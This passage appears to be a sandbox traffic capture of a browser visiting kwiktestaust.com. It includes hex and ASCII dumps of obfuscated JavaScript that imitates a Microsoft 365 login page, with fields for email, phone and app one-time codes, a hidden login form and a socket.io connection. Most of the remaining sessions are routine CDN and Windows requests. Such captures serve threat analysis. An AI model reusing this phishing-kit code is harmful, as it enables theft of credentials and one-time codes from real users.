                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: _cid=05688cc8bbdbb0122f88552d85978beb
                                                                2024-11-07 20:40:04 UTC854INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:04 GMT
                                                                Content-Type: application/javascript
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Wed, 30 Oct 2024 15:36:02 GMT
                                                                Vary: Accept-Encoding
                                                                Cache-Control: max-age=14400
                                                                CF-Cache-Status: MISS
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5G6AarYBWCGr89fmNlGcUtL%2BWHD6I7wDgsNREK0s0RBLQTWIf96vEMHFBlykenohUGP5XUOoG7ICYTNg1qVt1TI2n7iYfRBY6ZpLrYZ14Oig5qhh0iDgC70Be%2B2NLebSce4"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df022def976a915-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1229&delivery_rate=1563714&cwnd=186&unsent_bytes=0&cid=b355ae6b9a23e102&ts=1546&x=0"
                                                                2024-11-07 20:40:04 UTC515INData Raw: 37 64 30 39 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 37 36 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 65 64 39 34 34 20 3d 20 5b 27 68 72 65 66 27 2c 20 27 2e 70 68 6f 6e 65 6f 74 70 54 65 78 74 27 2c 20 27 72 65 61 64 79 53 74 61 74 65 27 2c 20 27 23 70 6c 61 79 6d 65 5f 62 69 67 27 2c 20 27 40 69 6f 6e 6f 73 2e 27 2c 20 27 23 70 6c 61 79 6d 65 27 2c 20 27 72 65 73 69 7a 65 27 2c 20 27 73 32 63 5f 72 65 73 74 61 72 74 27 2c 20 27 2e 6c 6f 61 64 65 72 78 42 6c 6f 63 6b 31 31 27 2c 20 27 73 32 63 27 2c 20 27 63 6f 6d 70 6c 65 74 65 27 2c 20 27 4f 33 36 35 27 2c 20 27 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67
                                                                Data Ascii: 7d09function _0xb276() { const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/imag
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 41 50 50 27 2c 20 27 6f 6e 66 6f 63 75 73 27 2c 20 27 2e 6c 6f 67 65 72 4d 65 27 2c 20 27 2e 61 70 70 6f 74 70 43 6f 64 65 27 2c 20 27 2e 6f 74 70 49 6e 70 75 74 32 27 2c 20 27 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 35 36 34 64 62 39 31 33 61 37 66 61 30 63 61 34 32 37 32 37 31 36 31 63 36 64 30 33 31 62 65 66 2e 73 76 67 27 2c 20 27 6b 65 79 75 70 27 2c 20 27 64 69 73 63 6f 6e 6e 65 63 74 27 2c 20 27 3c 70 2f 3e 27 2c 20 27 31 30 30 37 37 36 32 58 4e 73 77 55 63 27 2c 20 27 74 65 73 74 27 2c 20 27 69 6e 63 6c 75 64 65 73 27 2c 20 27 69 6e 74 65 72 61 63 74 69 76 65 27 2c 20 27 2e 6c 6f 61 64 65
                                                                Data Ascii: APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loade
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73 68 6f 77 68 65 61 64 65 72 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 6d 75 73 69 63 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                Data Ascii: 20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22showheader\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa-solid\x20fa-music\x22></i>\x0a\x20\x20\x20\x20\x20\x20\
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 67 5f 6d 75 73 69 63 5c 78 32 30 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 69 64 3d 5c 78 32 32 62 67 5f 6d 75 73 69 63 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 6d 75 73 69 63 5c 78 32 32 3e 3c 2f 69 3e
                                                                Data Ascii: \x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22bg_music\x20\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20id=\x22bg_music\x22\x20class=\x22fa-solid\x20fa-music\x22></i>
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6f 70 74 69 6f 6e 5f 74 6f 70 5f 72 69 67 68 74 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 31 2c 5c 78 32 30 31 34 35 2c 5c
                                                                Data Ascii: \x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22option_top_right\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20style=\x22color:\x20rgb(1,\x20145,\
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 73 70 61 6e 3e 48 65 6c 70 3c 2f 73 70 61 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 63 69 72 63 6c 65 2d 71 75 65 73 74 69 6f 6e 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78
                                                                Data Ascii: x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span>Help</span>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa-solid\x20fa-circle-question\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 69 64 3d 5c 78 32 32 62 61 73 65 5f 69 63 6f 6e 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 61 73 65 5f 63 6f 6e 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c
                                                                Data Ascii: 20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\x22base_icons\x22\x20class=\x22base_con\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 73 70 61 6e 3e 31 78 3c 2f 73 70 61 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                Data Ascii: 0\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span>1x</span>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 4c 4f 47 49 4e 5c 78 32 30 50 41 47 45 5c 78 32 30 53 54 41 52 54 5c 78 32 30 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 6f 67 69 6e 46 6f 72 6d 5c 78 32 32 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 45 4d 41 49 4c 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76
                                                                Data Ascii: iv>\x0a\x0a\x20\x20\x20\x20...\x20LOGIN\x20PAGE\x20START\x20\x20-->\x0a\x20\x20\x20\x20<div\x20style=\x22display:\x20none;\x22\x20class=\x22loginForm\x22>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20...\x20EMAIL\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div
                                                                2024-11-07 20:40:04 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 61 62 65 6c 42 75 74 74 6f 6d 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 3e 4e 6f 5c 78 32 30 61 63 63 6f 75 6e 74 3f 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 37 62 38 3b 5c 78 32 30
                                                                Data Ascii: 20\x20\x20\x20\x20\x20\x20<div\x20class=\x22labelButtom\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a>No\x20account?</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20style=\x22color:\x20#0067b8;\x20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.164972018.245.31.54436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:04 UTC566OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                Host: cdn.socket.io
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Origin: https://kwiktestaust.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:04 UTC702INHTTP/1.1 200 OK
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Content-Length: 49993
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=31536000, immutable
                                                                Content-Disposition: inline; filename="socket.io.min.js"
                                                                Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                Server: Vercel
                                                                Strict-Transport-Security: max-age=63072000
                                                                X-Vercel-Cache: HIT
                                                                X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                X-Cache: Hit from cloudfront
                                                                Via: 1.1 b8455bc5c5405f573b6e4da5524ee9e2.cloudfront.net (CloudFront)
                                                                X-Amz-Cf-Pop: FRA56-P8
                                                                X-Amz-Cf-Id: Aey7wrezuBt-2yRap61yP7ijFKecXfPsL_CFA9Gg02cZwz4lUwpzzA==
                                                                Age: 8719395
                                                                2024-11-07 20:40:04 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                2024-11-07 20:40:04 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                                2024-11-07 20:40:05 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                                Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                                2024-11-07 20:40:05 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                                Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.1649721184.28.90.27443
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:04 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: fs.microsoft.com
                                                                2024-11-07 20:40:05 UTC466INHTTP/1.1 200 OK
                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                Content-Type: application/octet-stream
                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                Server: ECAcc (chd/0790)
                                                                X-CID: 11
                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                X-Ms-Region: prod-eus-z1
                                                                Cache-Control: public, max-age=37473
                                                                Date: Thu, 07 Nov 2024 20:40:04 GMT
                                                                Connection: close
                                                                X-CID: 2


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.1649724104.17.24.144436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:05 UTC578OUTGET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:05 UTC950INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:05 GMT
                                                                Content-Type: text/css; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"623a082a-4ef8"
                                                                Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 182045
                                                                Expires: Tue, 28 Oct 2025 20:40:05 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2lWdxR2heqnOp6IwjEY8l6QZhpafhPy%2BTp2%2BS6r18SZoM8di0Gs9mhjQ%2Bu1tKrLBpKuexfJUo7JZbhbJZ%2BB1ua%2BcsyxTApS1bRmlZs3KMZlmY0mv%2BJeioQVZyISQgefPZWKlF7H"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8df022ec9c12ddae-DFW
                                                                alt-svc: h3=":443"; ma=86400
